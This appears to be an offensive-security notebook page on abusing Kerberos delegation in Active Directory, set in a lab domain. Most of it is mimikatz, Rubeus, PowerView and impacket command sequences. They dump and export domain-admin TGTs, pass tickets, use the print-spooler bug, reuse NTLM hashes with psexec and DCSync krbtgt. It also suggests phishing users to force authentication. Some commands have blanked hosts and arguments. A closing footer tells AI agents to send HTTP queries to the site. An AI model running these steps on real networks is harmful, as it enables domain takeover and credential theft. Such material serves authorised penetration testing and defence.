# Kerberos ## Kerberosting Check the Imported Ticket ``` klist ``` after that you can test it with ls ``` ls \\\c$ # to list file in the target machine with imported ticket. ``` ## Unconstrained Delegation `User` --- authenticates to ---> `IIS server` ---> authenticates on behalf of the user ---> `DB server` > Any user authentication (i.e CIFS) to the computer with unconstrained delegation enabled on it, will cache that user's TGT in memory, which can later be dumped and reused by an adversary. use tool -> **powerview\.ps1** ```powershell Get-DomainComputer -Unconstrained # search for useraccountcontrol : TRUSTED_FOR_DELEGATION # name : IIS01 (target where saving the TGT in memory) Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description ``` Exploit: ``` # require administrator mimikatz mimikatz# privilege::debug mimikatz# sekurlsa::tickets ```

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation

We could wait for user to connect with IIS01 or do phishing attack to force user connect to IIS01. Then check mimikatz again for TGT in the memory:

After we got OFFENSE.LOCAL/administrator, mean we got the administrator for entire domain. run this command to export the TGT. ``` mimikatz::tickets /export ```

Then import the ticket with `mimikatz` ``` kerberos::ptt [0;3c785]-2-0-40e10000-Administrator@krbtgt-OFFENSE.LOCAL.kirbi ``` login with PSExec or PSSession ``` PsExec.exe \\dc01 cmd Enter-PSSession dc01 ``` **Note:** ``` # check the imported TGT klist ``` Reference: {% embed url="" %} ## Constrained Delegation ``` . .\PowerView.ps1 Get-DomainUser -TrustedToAuth Get-NetUser -TrustedToAuth # test this first Get-DomainComputer -TrustedToAuth ``` note: `cn` (common name) -> current computer name `msds-allowedtodelegateto` -> target computer `useraccountcontrol` -> TRUSTED\_TO\_AUTH\_FOR\_DELEGATION example: IIS01 allows to contrained delegation to FILE\_01 ``` cn : IIS01 msds-allowedtodelegateto : {cifs/file_01.example.local, cifs/file_01} useraccountcontrol : TRUSTED_TO_AUTH_FOR_DELEGATION ``` {% hint style="info" %} User has to have an attribute `TRUSTED_TO_AUTH_FOR_DELEGATION` in order for it to be able to authenticate to the remote service. > TRUSTED\_TO\_AUTH\_FOR\_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network. > > > {% endhint %} Exploit on the computer that has `trusted_to_auth_for_delegation` ``` Rubeus.exe tgtdeleg /nowrap ``` When get the Base64 rubeus ticket. ``` # Import Ticket to Kali Linux # make sure the base64 file is one line. base64 -d ticket.kirbi.b64 > ticket.kirbi ticketConverter.py ticket.kirbi ticket.ccache export KRB5CCNAME=/home/kali/ticket.ccache ``` ``` crackmapexec smb -k secretdump.py /\$@. -dc-ip -no-pass -k ```

https://www.youtube.com/watch?v=FbTxPz_GA4o&t=7215s

``` # last step when we have the ntlm hash psexec.py -hashes : administrator@ ``` **Note:**

When access kerberost things, make sure your clock screw is good. ```bash sudo ntpdate -u ``` reference:\ ## DC PrintSpooler Our environment for this lab is: * ws01 - attacker compromised host with kerberos delegation enabled (attacker, server) * dc01 - domain controller running a print service (victim, target) check with this ``` ls \\DC01\pipe\spoolss dir \\DCO1\pipe\spoolss ``` Before attack (administrator cmd in breached computer ws01 ) ``` Rubeus.exe monitor /interval:4 /filteruser:DC01$ ``` Then run SpoolSample.exe (cmd.exe) in IIS01 ``` # SpoolSample.exe SpoolSample.exe DC01 ws01 # return TGT ``` Rubeus could also import the TGT directly to **memory**: ``` Rubeus.exe ptt /ticket: ``` We indeed got a TGT for DC01$ computer! With this, we can make our compromised system `ws01$` appear like a Domain Controller and extract an NTLM hash for the user `offense\spotless` which we know has high privileges in the domain: ``` # in this case spotless is domain admin user. mimikatz # lsadump::dcsync /domain:offense.local /user:spotless mimikatz # lsadump::dcsync /domain:offense.local /user:krbtgt ```

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation#execution

reference: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacker-mind.gitbook.io/hacker-mind/post-exploit/active-directory/kerberos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.